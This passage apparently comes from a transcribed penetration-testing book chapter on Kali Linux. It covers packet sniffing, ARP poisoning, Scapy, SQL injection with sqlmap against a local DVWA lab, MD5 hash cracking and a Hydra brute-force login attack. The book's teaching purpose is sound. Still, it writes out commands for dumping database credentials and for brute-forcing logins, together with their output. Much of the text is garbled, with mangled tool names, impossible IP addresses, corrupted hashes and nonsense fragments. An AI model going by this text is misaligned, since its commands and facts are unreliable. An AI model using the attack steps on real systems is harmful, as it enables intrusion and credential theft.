the correct IP network. MAC addresses ensure one thing, that the data is sent to the correct destination network. Delivery to the correct host is also ensured in such cases. In a normal situation, a host gets the data intended for it. It will never receive data intended for another host. However, a sniffer can receive data not intended for it. The 2 types of sniffing are passive and active. OCO passive sniffing listens to and captures traffic. It is especially useful in a network connected by hubs. Wi-Fi. Passive sniffing is hard to detect. OCO active sniffing launches Address Resolution Protocol, ARP. Spoofing, it is also called a traffic flooding attack against a switch to capture traffic. The active type is detectable. In cases of hubs or wireless media, all hosts on the network can see all the traffic, and this makes the life of a sniffer much easier. A passive sniffer can capture traffic going to and from all hosts connected via the wireless media. The switch works in a different way. It sends data according to the MAC address. It is organized, and it maintains a MAC table of all the systems and port numbers to which it is connected. For this reason, switches are always safer than hubs. However, this is not foolproof. Using a span port or Port mirroring may enable all data to be duplicated to another port. Protocols are always susceptible to sniffers if they are not encrypted. By using a sniffer, you can easily capture protocols such as HTTP, POP3, Simple Network Management Protocol, SNMP, and FTP. Username and passwords can be extracted from sniffing. In normal cases, any system will read and respond to the traffic sent directly to the MAC address. However, changing a network interface card, NIC, to promiscuous mode changes the game completely. Many hacking tools change the system-dependent NIC to promiscuous mode. In promiscuous mode, the NIC reads all traffic and sends it to the sniffer. Many hacking tools also incorporate a specially designed promiscuous mode driver that facilitates the sniffing process. ARP poisoning is a threat. The address resolution protocol plays a major role while data travels over a network. To reach one host, another host needs the MAC address. Although the IP address is the first necessity, ARP translates the IP address to the MAC address to help the host get to the proper address. If the host has a past conversation record with another host, it first searches its ARP cache to find the MAC address. If it has not done that, it asks for the IP address first through the ARP broadcast. What an attacker does is simple. An attacker sends a fake or spoofed ARP message to the Ethernet LAN. These frames contain false MAC addresses that are enough to confuse network devices like switches, and this allows the packets to be sniffed. Alternatively, they can be sent to unreachable addresses in a denial of service (DOS) attack. These methods are known as ARP spoofing or poisoning. SnifJoke prevents poisoning. To avoid such poisoning, there is a good tool called SnifJoke. You can open this terminal-based sniffer countermeasure application from the sniffing and spoofing category in Kali Linux. If you want to open it as a user, it will crack a joke first. / code as a Kali Linux user. PG@Kali $SnifJoke. SnifJoke is too dangerous to be run by a humble user. Go to fetch daddy root now. Therefore, you need to issue the su command and become the root user. You may try to send some packets to your IP address like this. Sending packets through SnifJoke is safer because it is basically a connection scrambler. Its main purpose is to prevent packet sniffers from reassembling the network sessions of the user. It uses a local fake tunnel to manage the packets. While doing this, it doesn't disturb the kernel. The usage of SnifJoke is a bit cryptic, and you won't find any documentation. However, that can make SnifJoke a good countermeasure to prevent sniffing, since the bad guys don't have any documentation either. If you can place a PHP script on a web server protected by a secured protocol, you can run the SnifJoke auto test command against it, and you can identify the evasion techniques being used while running the 229 Chapter 9 SQL mapping code on your virtual Kali Linux server. It creates a series of configuration files. According to the SnifJoke GitHub page, the PHP script looks like this. / PHP code from SnifJoke GitHub page. PHP. If, ESET, $_post spare data. 4, $x equals 0, $x strlen, $_post spare data, $x ++. If, is _numeric, $_post spare data $x. Continue. Echo bad value in $x offset. Exit. Echo $_post spare data. I put the PHP script in the https://sanjeebzaina.com/snif.php file. Then, I ran this code. // code for SnifJoke. Root at Kali hashtag snifjoke auto test l snif d slash usr slash var slash snifjoke slash https://sunjeebzaina.com slash snif.php a 10.0.2.2. Here L is for listing, and D stands for directory. When I executed the file, I got the following output. //snifjoke code output. Root at Kali hashtag snifjoke auto test l home d slash usr slash var slash snifjoke slash http://www.sunjeebzaina.com slash test.php a 192.168.2.2. Asterisk stopping possible running snifjoke, slash usr slash bin slash snifjoke ectl. Quit. Hello yellow daddy. http://chineseushi.deviantart.com /art. Asari logic 194960943. Plus starting snifjoke hacks test. Remote server IP 192.168.2.2 and http URL www.sunjeebzaina.com. Plugin name. Scramble. Test ID. Segmentation. Innocent. Segmentation/innocent. Test directory. /tmp/home/segmentation/innocent. Asterisk goal. Generate tilfocusmap.bin, and test snifjoke. Without any esoteric network trick. Executing snifjoke with segmentation innocent combo. Snifjoke debug 6 user nobody group na group start dir. /tmp/home/segmentation/innocent location replica 1 only. Plugin segmentation innocent. A new directory called home was created in the tmp directory. If you go into it, you could find these newly created files and folders. // output of the home directory. Generic lan.info plugins test suit segmentation spare data_. Plugin. Now go to the segmentation folder and get the listing there. First, you will see the ipoptions.conf file. This contains option sections within the TCP header, IP and TCP together. When a host, a personal computer, initiates a TCP session, the host negotiates the IP segment size. / code to get data from segmentation folder. Root at Kali/tmp/test #cd. Root at Kali/tmp #cd home/. Root at Kali/tmp/home #ls. Generic lan.info plugins test suit segmentation spare data_. Plugin. Root at Kali/tmp/home #cd segmentation / root at Kali/tmp/home /segmentation #ls. Innocent. Root at Kali/tmp/home /segmentation #cd innocent / root at Kali/tmp/home /segmentation /innocent #ls. Replica 1. Root at Kali/tmp/home /segmentation /innocent #cd replica 1 / root at Kali/tmp/home /segmentation /innocent /replica 1 #ls. Dump service_stat.log ipoptions.conf ip whitelist. conf root after .log snifjoke service.conf. Finally, take a look at the snifjoke service.conf file. In the snifjoke service.conf file, you can uncomment the ipblacklist.conf file that contains the destination IP addresses to be ignored. If you uncomment the ipwhitelist.conf file, it lists the destination IP addresses to be covered by snifjoke in the future. The ipoptions.conf file contains the working IP and TCP option combinations that I have just explained. Now after editing the configuration files, you can run snifjoke like this. / code for running snifjoke. Root at Kali #snifjoke location home. The tool will run in the background and update the default gateway so That all packets are routed through it for manipulation and you can prevent sniffing. Sniff joke is a good countermeasure to prevent sniffing, however. Because of the unavailability of any official documentation, it does not have a lot popularity among security people. Analyzing protocols using Wireshark. Another good protocol analyzer is Wireshark. Just type Wireshark in the Kali Linux terminal to open the software. You can start capturing packets through it. In addition, if you open the browser and browse any website, the packets are shown automatically in the Wireshark GUI, Figure 9.2. Figure 9.2. Wireshark is running and capturing traffic. You can save all the traffic captured before closing the Wireshark using the file O times N save option. Figure 9.3 shows all the traffic captured on this interface through Wireshark. If you look at the protocols closely, you will find that there are many protocols such as TCP, HTTP, SMT, and so on. If you browse any HTTPS-enabled website, it will immediately start showing in the interface. Figure 9.3. Wireshark has captured all the traffic. By learning the protocols, you can do all the necessary scanning later. The basic purpose here is to capture the network traffic for later scanning. And in addition you can try to understand how ARP spoofing might start at this point. Sniffing packets using SCAPI. How can you send, sniff, dissect, and forge network packets? The answer is SCAPI. This is a Python program that comes with Kali Linux. Through SCAPI you can probe, scan, and even attack a network. The interactive packet manipulation capability of SCAPI has made it a powerful tool in the sniffer business. For scanning, trace routing, probing, unit tests, attacks, or network discovery, SCAPI is ideal, and it can be compared to other great sniffing tools such as Hoping, ARP Spoof, ARP-SK, ARPing, P0F, and even MAP, Dump, and Shark. Let us see how SCAPI works. Open your virtual Kali Linux terminal and type the following. SCAPI. Let us see a few methods that SCAPI uses, shown here. / code using SCAPI. LSC. ARP key poison. ARPing. Bind _ layers. Bridge _ sniff. Corrupt _ bits. Corrupt _ bytes. Defrag. Poison targets cache with your MAC victim's IP, couple. Send ARP who has requests to determine which hosts are up. Bind 2 layers on some specific fields. Values. Forward traffic between two interfaces. And sniff packets exchanged. Flip a given percentage or number of bits from a string. Corrupt a given percentage or number of bytes from a string. Defrag, plist, dash, not fragmented. Defragment. As you see in the previous code, many things look achievable using SCAPI. You can sniff the exchanged packets, you can corrupt a packet, and you can poison ARP and other things. Now let us sniff some packets and try to understand how network layers work. On the SCAPI terminal, just type this command. / sniff using SCAPI. Packets equals sniff, filter equals ICMP, efface equals eth0. It will not generate anything because SCAPI starts sniffing the packets. On this interface, you need to ping your IP address so that the packets can be captured. Open another window of your Kali Linux terminal and start pinging. / code for pinging. Root at Kali hashtag ping 192.168.2.2. Ping 192.168.2.2, 192.168.2.2, 56, 84, bytes of data. 64 bytes from 192.168.2.2, ICMP underscore sec equals 1 TTL equals 63 time equals 0.147 ms. 64 bytes from 192.168.2.2, ICMP underscore sec equals 2 TTL equals 63 time equals 0.155 ms. 64 bytes from 192.168.2.2, ICMP underscore sec equals 3 TTL equals 63 time equals 0.162 ms. 64 bytes from 192.168.2.2, ICMP underscore sec equals 4 TTL equals 63 time equals 0.154 ms. 64 bytes from 192.168.2.2, ICMP underscore sec equals 5 TTL equals 63 time equals 0.159 ms. 64 bytes from 192.168.2.2, ICMP underscore sec equals 6 TTL equals 63 time equals 0.151 ms. 64 bytes from 192.168.2.2, ICMP underscore sec equals 7 TTL equals 63 time equals 0.154 ms. 64 bytes from 192.168.2.2, ICMP underscore sec equals 8 TTL equals 63 time equals 0.156 ms. C 192.168.2.2 ping statistics. 8 packets transmitted, 8 received, 0% packet loss, time 7008 milliseconds. RTT min slash average slash max slash mdef equals 0.147 slash 0.154 slash 0.162 slash 0.015 ms. These ping statistics show that 8 packets were transmitted, 8 were received, there was 0% packet loss, and the time taken was 7008 milliseconds. Now you can go back to the second terminal where you have SQL open. Here is the output of the packets. / the number of sniffed packets. Packets. Sniffed, TCP 0. UDP 0. ICMP 16 other 0. 236. Chapter 9 SQL Mapping. You clearly see that through ICMP I have captured 16 packets. Leticos. Learn more about it. Now you can close the second ping terminal. In the SQL terminal, issue the following commands so that you can use the show method. The output will show all the packets that have been captured so far. / showing captured packets. Packets.show 0000 ether / IP / ICMP 10.2.1519.2.168.2.2 echo request 0 / raw 0001 ether / IP / ICMP 192.168.2.2 echo reply 0 / raw 0002 ether / IP / ICMP 10.2.1519.2.168.2.2 echo request 0 / raw 0003 ether / IP / ICMP 192.168.2.210.0.0.2.15 echo reply 0 / raw 0004 ether / IP / ICMP 10.0.2.1519.2.168.2.2 echo request 0 / raw 0005 ether / IP / ICMP 192.168.2.210.0.0.2.15 echo reply 0 / raw 0006 ether / IP / ICMP 10.0.2.1519.2.168.2.2 echo request 0 / raw 0007 ether / IP / ICMP 192.168.2.210.0.0.2.15 echo reply 0 / raw 0008 ether / IP / ICMP 10.0.2.1519.2.168.2.2 echo request 0 / raw 0009 ether/IP/ICMP192.168.2.210.0.0.2.15 echo reply 0/raw 0010 ether/IP/ICMP10.0.2.15.192.168.2.2 echo request 0/raw 0011 ether/IP/192.168.2.210.0.0.2.15 echo reply 0/raw 0012 ether/IP/1.0.2.15.192.168.2.2 echo request 0/raw 0013 ether/IP/192.168.2.210.0.0.2.15 echo reply 0/raw 0014 ether/IP/1.0.2.15.192.168.2.2 echo request 0/raw 0015 ether/IP/192.168.2.210.0.0.2.15 echo reply 0/raw. Now it is clear why the earlier output showed 16 packets. I have captured packets through the virtual Kali Linux terminal. It is much easier to get the individual packets by dissecting the Python tuple through an index. Let echo see packet 3 / showing packet number 3. Packets 3. Ether DST equals 08:00:27E1C3:47 SRC equals 52:54:00:1235:02 type equals 0x800. IP version equals 4 LEL equals 5 LTOS equals 0x0 len equals 84 ID equals 7979 flags equals dffrag equals 0 L. TTL equals 63 proto equals ICMP checksum equals 0x4 DC5 SRC equals 192.168.2.2 DST equals 10.0.2.15. Options equals ICMP type equals echo reply code equals 0 checksum equals 0x2 BAA. ID equals 0x70 FSEC equals 0x2 raw load equals AX08. X18. Hashtag $% and, asterisk plus comma dash dot slash 01234567. This clearly shows 4 layers, Ether, IP, ICMP, and raw. You can see a summary in the following output. / output of the packets summary. Packets 3. Summary. Ether/IP/ICMP 192.168.2.210.0.0.2.15 echo reply 0/raw. You can also go deep into the packet layers with these commands. / showing captured packets in detail. Packets 3.0. Ether DST equals 08:00:27E1C3:47 SRC equals 52:54:00:1235:02 type equals 0x800. IP version equals 4 LEL equals 5 LTOS equals 0x0 len equals 84 ID equals 7979 flags equals dffrag equals 0 L. TTL equals 63 proto equals ICMP checksum equals 0x4 DC5 SRC equals 192.168.2.2 DST equals 10.0.2.15. Options equals ICMP type equals echo reply code equals 0 checksum equals 0x2 BAA. ID equals 0x70 FSEC equals 0x2 raw load equals XF7. X17. Hashtag $% and, asterisk plus comma dash dot slash 01234567. 238. Chapter 9 SQL Mapping. Packets 3.1. IP version equals 4 LEL equals 5 LTOS equals 0x0 len equals 84 ID equals 7979 flags equals dffrag equals 0 L. TTL equals 63 proto equals ICMP checksum equals 0x4 DC5 SRC equals 192.168.2.2 DST equals 10.0.2.15. Options equals ICMP type equals echo reply code equals 0 checksum equals 0x2 BAA. ID equals 0x70 FSEC equals 0x2 raw load equals XF7 X17 hashtag $% and asterisk plus comma dash dot slash 012345667 packets 32 ICMP type equals echo reply code equals 0 checksum equals 0x2 BAA ID equals 0x70 FSEC equals 0x2 raw load equals A X00 X1C hashtag $% and asterisk plus comma dash dot slash 012345667 packets 33 raw load equals A X00 X1C hashtag $% and asterisk plus comma dash dot slash 012345667. You can go deeper into the source of any individual packet by using this command / source of the captured packet packets 31.src 192.168.2.2 packets 3.show hashtag ethernet hashtag DST equals 08:00:27E1C3:47 SRC equals 52:54:00:1235:02 type equals 0x800 hashtag IP hashtag version equals 4L EL equals 5L TOS equals 0x0 len equals 84 ID equals 7979 flags equals DF frag equals 0L TTL equals 63 proto equals ICMP checksum equals 0x4 DC5 SRC equals 192.168.2.2 DST equals 10.0.2.15 options hashtag ICMP hashtag type equals echo reply code equals 0 checksum equals 0x2 BAA ID equals 0x70F sec equals 0x2 hashtag raw hashtag load equals A X00 X1A hashtag $% and asterisk plus comma dash dot slash 012345667. A captured packet consists of many things. The first is the IP address 192.168.2.2. Later the SRC, or source key, has the same value. You can also learn the protocol being used. Here it is ICMP, or Internet Control Message Protocol. You also have the MAC address, 52:54:00:1235:02 and DST adapter address. You also have the sum of the correct digits that are compared later, 0x2 BAA. You should now understand how network layers and sniffers work together. There are many other tools available, however, and most of them are open source and free. So, go ahead and test them individually to see how they work in VirtualBox. SQL Injection. There are several hacking techniques available for exploiting weaknesses in applications. SQL Injection is one of them. Note: structured query language, SQL, is the language of databases and is used to retrieve and alter data in a database. In badly written programs, some parameters can leave weaknesses in the application. Through HTML forms, malformed SQL queries are injected into the web interface, and through them crackers can try to map the system. SQL injection and buffer overflow are such techniques that crackers use to exploit those vulnerabilities. Usually, data is stored in a temporary place called a buffer, and sometimes the extra data overflows cause areas of weakness that a hacker can exploit. SQL injection is possible through user input fields. Almost every web site uses forms to take input from the users. Users enter a username and password and perform a search for a keyword. Sometimes these username and password input fields are not sanitized or remain unverified. So, a web site develops vulnerabilities as far as SQL injection is concerned. Sometimes, crackers can exploit these vulnerabilities, causing a shutdown of the system. For that reason, developers should take SQL injection or buffer overflow countermeasures by utilizing proper and secure programs. A penetration tester must have adequate knowledge of how to detect and exploit SQL injection flaws. A good tool to use is SQLmap. It is an open-source penetration testing tool, and it automates the process of detecting and exploiting those flaws. It takes over the database servers and finds the internal data. Detecting SQL injection vulnerabilities. How can you detect whether an application has vulnerabilities? It is easy to find out. You can check it by studying the URL and passing in some extra data. For example, suppose a company allows people to access employee details. A URL for accessing the Presidentico's page might look like this: http://company.com/employee.php?id 1. By adding conditions to the SQL statement and evaluating the web application OCO's output, you can determine whether this website has vulnerabilities. In most cases, the SQL statement used by the company database might look like this: //SQL statement used for injection. Select ID, name, description from employee where ID = 1. Quite naturally, the database servers respond by returning the data for the first employee. The web page CSS styling will format the response into a good-looking HTML page. As a penetration testing expert, you can try to inject an extra Boolean-based true condition into the where clause. Suppose you make a request like this: http://company.com/employee.php?id 1 and 1 1. In addition, the database servers execute the queries like this: / executing queries in database. Select ID, name, description from employee where ID = 1 and 1 1. If this request returns the same employee ID, the application has SQL injection vulnerabilities. This is because the user's input has been interpreted as SQL code. It should not have happened that way. If the site were secure, it would have rejected the request. In that case, it would treat the user's input as a value, and the requested value combination, 1 and 1 = 1. At the end of the URL would result in a type mismatch. You can use SQLmap to ascertain whether a web application has vulnerabilities. How to use SQLmap? To test SQLmap, you can get help from the DVWA website, which is a PHP/MySQL web application that was created to be vulnerable. You can download this web application to your local server and run tests on it. The application is actually not as vulnerable as it claims. However, you can try to break it by injecting some poison into it. This is a safe, legal practice. Before you start using SQLmap, remember one important thing: you cannot and should not use it on any live system without getting permission from the proper authorities. Therefore, the main purpose of DVWA is to help security professionals test their skills and tools in a legal environment. I will now show how you can do that. First, go the DVWA website and download the zipped application folder. If your host machine is Windows, then the best bet is to use XAMPP to run the local host web server. In any Linux distribution, you can upgrade your PHP version to 7-star. If your local Web Apache 2 web server runs perfectly, it looks like Figure 924. Figure 924. Localhost running on a host machine. The next step is to install DVWA application on your local server. Figure 925. At the first go, it shows you many discrepancies in your PHP configuration. Figure 925. DVWA web application setup check. Once you have managed those discrepancies, the application will guide you to the login page, Figure 926. In the username input field, provide admin, and in the password field provide password. Now you can log into the DVWA secured web application. Figure 926. DVWA login page. Before testing vulnerabilities, you need to check whether your MySQL database server is working well. You can install MySQL in any Debian Linux distribution with this command. // code to install MySQL on Linux. Sudo apt-get install MySQL client core 5.5. Sudo apt-get install MySQL server. It will give you output like this. / output of installation of MySQL. Reading package lists. Done. Building dependency tree. Reading state information. Done. The following packages were automatically installed and are no longer required. libappindicator 1 libxam1 i386 libindicator 7 libelm 3.6 libm1 Linux headers 3.19.0-25 Linux headers 3.19.0-25 generic Linux image 3.19.0-25 generic Linux image extra 3.19.0-25 generic Python NTDB Winedevil AMD 64 Winedevil i386 Use apt-get auto remove to remove them. The following extra packages will be installed, OC. Next, you need to tweak some parts of the systemicos php.ini file to run DVWA locally. Now you can safely reset the database through the DVWA application so that it creates a database called DWA in your MySQL server. It is wise not to use your virtual Kali Linux local Apache 2 server to run DVWA. You should use your host system to do that. In the case of Kali Linux, it uses MariaDB instead of MySQL, so the DVWA application might not act properly in your virtual Kali Linux. However, you can learn how to create a database on the Kali Linux terminal. If you issue the MySQL command on your Kali Linux terminal, it outputs this / MySQL command output in Kali Linux. Root at Kali /var /www/html/dvwa master #MySQL. Welcome to the MariaDB monitor. Commands end with /g. Your MariaDB connection ID is 48. Server version 10.1.29 MariaDB 6 Debian build unstable. Copyright C. 2017, Oracle, MariaDB Corporation of and others. Type help, or H for help. Type C to clear the current input statement. Now you can create a database here by using a SQL command like this. / code for creating database. MariaDB, none, create database DWA. Query OK, 1 row affected, 0.00 SEC. MariaDB, none, grant all on DWA * to DWA at localhost. Identified by XXX. Query OK, 0 rows affected, 0.00 SEC. MariaDB, none, flush privileges. Query OK, 0 rows affected, 0.00 SEC. In addition, you can create a users table by issuing these commands. / creating users table in Kali Linux MariaDB DBWA database. MariaDB, none, used way. Database changed. MariaDB way create table users, username char, 20, password char, 20. Query OK, 0 rows affected, 0.06 SEC. MariaDB way describe users. Plus dash dash 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 plus. Field type null key default extra. Plus dash dash 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 plus. Username char, 20, yes. Null. Password char, 20, yes. Null. Plus dash dash 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 plus. 2 rows in set, 0.00 SEC. This will create the database and tables, but the advantage of the DBWA application is that it comes with its own database. It already has a few users like this. / DBWA users table. MySQL select asterisk from users. Plus dash dash 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 plus. User underscore ID first underscore name last underscore name user. Password. Last underscore login. Avatar. Failed underscore login. Plus dash dash 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 plus. 1 admin. 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 5F40CC3B5A765D6 1D8327Deb8827users/hackable/administration JPG. May 25, 2018, 10:06 and 1 second. 0. 2 Gordon. Brown. Gordon. E9918C428CB38D5F260853678922303/hackable/users/gordon.jpg. May 25, 2018, 10:06 and 1 second. 0. 3 Hack. May 1337. 8D3533D75AE2C3966D7E0D4FC69216B/hackable/users/1337.jpg. May 25, 2018, 10:06 and 1 second. 0. 4 Pablo. Picasso Pablo. 0D1070D09F5408K3-5C71999B7/hackable/users/pablo.jpg. May 25, 2018, 10:06 and 1 second. 0. 5 Bob. Smith. Smithy. 5F40CC3B5A765D6 1D8327Deb8827C F99/hackable/users/smithy.jpg. May 25, 2018, 10:06 and 1 second. 0. Plus dash dash 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 plus. It has many fields such as the following. / output of fields. User underscore ID first underscore name last underscore name user. Password. Avatar. Last underscore login. Failed underscore login. Now you can open your Kali Linux applications listing and run SQL map. It has full support for 6 SQL injection techniques, Boolean-based blind, time-based blind, error-based, union queries, and out-of-band. You can issue a command like this to test the vulnerabilities of your locally hosted DBWA website. //sclmap code. sclmap http://localhost/dbwa-master/vulnerabilities/sequeli_. blind /ID equals 2 and submit equals submit and user underscore token equals 929121268383725 EC75F8ACF41D 519 of 50 hashtag DBS. If you want to show all the tables in the DBA database, you can append the following to the previous code. / to show the database tables using sclmap. sclmap http://localhost/dbwa-master/vulnerabilities/sequeli_. blind /ID equals 2 and submit equals submit and user underscore token equals 9291212683725 EC75F8ACF41D 519 of 50 hashtag DBA ocodables. Suppose you want to have all the usernames from the users table use the following. / showing all usernames. sclmap http://localhost/dbwa-master/vulnerabilities/sequeli_. blind /ID equals 2 and submit equals submit and user underscore token equals 9291212683725 EC75F8ACF41D 519 of 50 hashtag T-users ococolum. Finally, you want to grab all the usernames and passwords from the users table. / getting all usernames and passwords. sclmap http://localhost/dbwa-master/vulnerabilities/sequeli_. blind /ID equals 2 and submit equals submit and user underscore token equals 9291212683725 EC75F8ACF41D 519 of 50 hashtag cuser, password okadump. Usually you can learn many things from the output. You can get an idea of how sclmap works, as shown here. / output of sclmap on terminal. 10 hours 37 minutes and 26 seconds warning get parameter submit does not seem to be injectable. 10 hours 37 minutes and 26 seconds warning get parameter user underscore token does not appear to be dynamic. 10 hours 37 minutes and 26 seconds warning heuristic, basic, test shows that get parameter user underscore token might not be injectable. 10 hours 37 minutes and 26 seconds info testing for SQL injection on get parameter user underscore token. 10 hours 37 minutes and 27 seconds info testing and Boolean based blind, where or having clause. 10 hours 37 minutes and 27 seconds info testing MySQL equals 5.0 Boolean based blind. Parameter replace. 10 hours 37 minutes and 27 seconds info testing MySQL equals 5.0 and error based. Where, having, order by or group by clause, floor. 10 hours 37 minutes and 28 seconds info testing PostgreSQL and error based, where, or having clause. 10 hours 37 minutes and 28 seconds info testing Microsoft SQL Server /Sybase n. Error based, where or having clause, in. 10 hours 37 minutes and 28 seconds info testing Oracle and error based, where or having clause, XML type. 10 hours 37 minutes and 28 seconds info testing MySQL equals 5.0 error based, parameter. Replace, floor. 10 hours 37 minutes and 28 seconds info testing MySQL inline queries. 10 hours 37 minutes and 29 seconds info testing PostgreSQL inline queries. 10 hours 37 minutes and 29 seconds info testing Microsoft SQL Server /Sybase inline queries. 10 hours 37 minutes and 29 seconds info testing PostgreSQL 8.1 stacked queries. Comment. 10 hours 37 minutes and 29 seconds info testing Microsoft SQL Server / Sybase stacked. Queries, comment. 10 hours 37 minutes and 29 seconds info testing Oracle stacked queries, DBMS_pipe. Receive_message, comment. 10 hours 37 minutes and 29 seconds info testing MySQL equals 5.0.12 and time-based. Blind. 10 hours 37 minutes and 30 seconds info testing PostgreSQL 8.1 and time-based. Blind. 10 hours 37 minutes and 30 seconds info testing Microsoft SQL Server / Sybase time. Based blind, if. 10 hours 37 minutes and 30 seconds info testing Oracle and time-based blind. 10 hours 37 minutes and 30 seconds info testing generic union query, null, 1 to 10. Columns. 10 hours 37 minutes and 32 seconds warning get parameter user_token does not seem to be injectable. 10 hours 37 minutes and 32 seconds critical all tested parameters do not appear to be injectable. Try to increase values for level/risk. Options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved, e.g. WAF, maybe you could try to use option tamper, e.g. tamper equals =2 comment. You can see that there are several other options available in SQL map. You can append the level option to 5. That is the maximum value it can take, the default value is 1. The risk option can be appended, and the maximum value is 3, the default value is 1. The level option depends on what type of system you are using SQL map on. Brute force or password attacks. In the Kali Linux hacking tools listing, you won't see any category named brute force attacks, although there is a category called password attacks. They are same and share common tools such as TCH Hydra, in short. Hydra, Find Me Hash, John the Ripper, and many more. The phrase brute force means the illegal effort of breaking into the back end of a system to get the username/password combination. It could consist of trial and error methods, it could be a planned effort, with well-structured, automated attacks using bots. There are inherent risks involved in password-based authentication. A brute force attacker might break into your system, sometimes they make an educated guess because people often use their own names, their children's names, locations, and so on. Many organizations are waking up lately to this grim reality and are starting to use biometric or two-factor authentication to avoid such risks. Web services like Gmail and others also offer two-factor authentication. In places like banks, it is mandatory to use a one-time password, OTP, that comes to a mobile handset. In some cases, where two-factor authentication is not available, using a strong password might come to help. However, often people avoid that just because it is hard to memorize. They make another mistakes, as well, such as storing passwords in a text file in their system. Crackers write simple Python scripts to carry out thousands of these break-in attempts against websites and sometimes gain access. In this example, I will show how easy it is to break into the hashed password if you use a simple password like the initials of your name. I first use the Find Me Hash tool to show how you can break the MD5 hash. First, find an MD5 hash generator website. There are plenty. I have used my initials, SS, to generate a hashed password, figure 9 to 7. It comes out as 3691308F2A4C2F6983F2880D32E29C84. This looks quite formidable, but it is actually not. Figure 9 to 7. MD5 hash generator web application. Let's try to break this hash. Open your Kali Linux terminal and type this code / breaking the hash using find me hash. Find me hash MD5H3691308F2A4C2F6983F2880D32E29C84. It will take some time depending on your internet speed. The output looks like this. / output of find me hash on terminal. Root at Kali hashtag find me hash MD5H3691308F2A4C2F6983F2880D32E29C84. Cracking hash 3691308F2A4C2F6983F2880D32E29C84. Analyzing with md5.com.cn, http://md5.com.cn. Hash not found in md5.com.cn. Analyzing with digitalzone.pl, http://md5.digitalzone.pl. Hash not found in digitalzone.pl. Analyzing with dracen.net, http://md5.dracen.net. Hash not found in dracen.net. Analyzing with myinfosec, http://md5.myinfosec.net. Hash not found in myinfosec. Analyzing with md5.net, http://md5.net. Hash not found in md5.net. Analyzing with noiseTTE.ch, http://md5.noiseTTE.ch. Hash not found in noiseTTE.ch. Analyzing with md5hood, http://md5hood.com. Hash not found in md5hood.oc. Finally, it cracks the hash, and it displays the output on the terminal as well. It is like this. / cracking the MD5 hash using find me hash. Analyzing with rednoise, http://md5.rednoise.com. Hash not found in rednoise. Analyzing with md5db, http://md5-db.de. Hash not found in md5db. Analyzing with my address, http://md5.my-address.com. Hash cracked. The original string is SS. The following hashes were cracked: 3691308F2A4C2F6983F2880D32E29C84-SS. Root at Kali hashtag. Now you understand the risks of using a simple word as a password? In the next brute force / password cracking example, I will use the TCH Hydra tool and show how easy it is to find out a password from a text file stored on the system. In the previous section, you learned how to install the DVWA website on your local machine. You are running that website, and you know there is a user called admin who has a password such as password. However, as an admin, I have made a mistake. I have stored all my password listings in a text file called passlist on my system. The cracker somehow has come to know that, and he is using Hydra to get that listing. Here is the code that he has used to extract all the passwords I have stored in a file. / password attack using Hydra. Root at Kali hashtag Hydra L admin p passlist 192.168.2.2 http post form /dvwa master /login.php username equals user and password equals pass and low gin equals login failed v. After executing the previous code using the Hydra tool, the output is as follows. / output of password extraction using Hydra. Hydra v8.6, c. 2017 by Van Houser /THC, please do not use in military or secret service organizations, or for illegal purposes. Hydra, http://www.thc.org/thc-hydra, starting at May 26, 2018. 12 hours 52 minutes and 36 seconds. Data max 6 tasks per one server, overall 6 tasks, 6 login tries. L1/P6, 1 try per task. Data attacking http post form //192.168.2.2:80//dvwa master/ login.php username equals *user and password equals *pass and login equals login. Failed. Attempt target 192.168.2.2, login admin, pass admin, 1. Of 6 child 0, 0/0. Attempt target 192.168.2.2, login admin, pass ad, 2 of 6 child 1, 0/0. Attempt target 192.168.2.2, login admin, pass POS, 3. Of 6 child 2, 0/0. Attempt target 192.168.2.2, login admin, pass mod, 4. Of 6 child 3, 0/0. Attempt target 192.168.2.2, login admin, pass. Password, 5 of 6 child 4, 0/0. Attempt target 192.168.2.2, login admin, pass, 6 of 6. Child 5, 0/0. 80 http post form host, 192.168.2.2 login. Admin. Password, 80 http post form host, 192.168.2.2 login. Admin. Password, admin. 80 http post form host, 192.168.2.2 login. Admin. Password, ad. 80 http post form host, 192.168.2.2 login. Admin. Password, POS. 80 http post form host, 192.168.2.2 login. Admin. Password, mod. 80 http post form host, 192.168.2.2 login, admin. 1 of 1 target successfully completed, 6 valid passwords found. Hydra, http://www.thc.org/thc-hydra, finished at May 26, 2018. 12 hours 52 minutes and 37 seconds. As you can see, Hydra finds the desired password in my text file. And it shows right at the top. Now the cracker can use the username and password combination and log in to the remote system. What have you learned from this? When two-factor authentication is not available, the best line of defense against a brute force attacker is to have a strong username and password combination, with alphanumeric characters, special characters, and capital letters. Even more important, you should not store the password listing on your system. Keep your password in your memory. No brute force or password attack technology has been discovered so far that can break into your memory. Therefore, that is the safest place. As a penetration tester, you need to explain those points to your clients.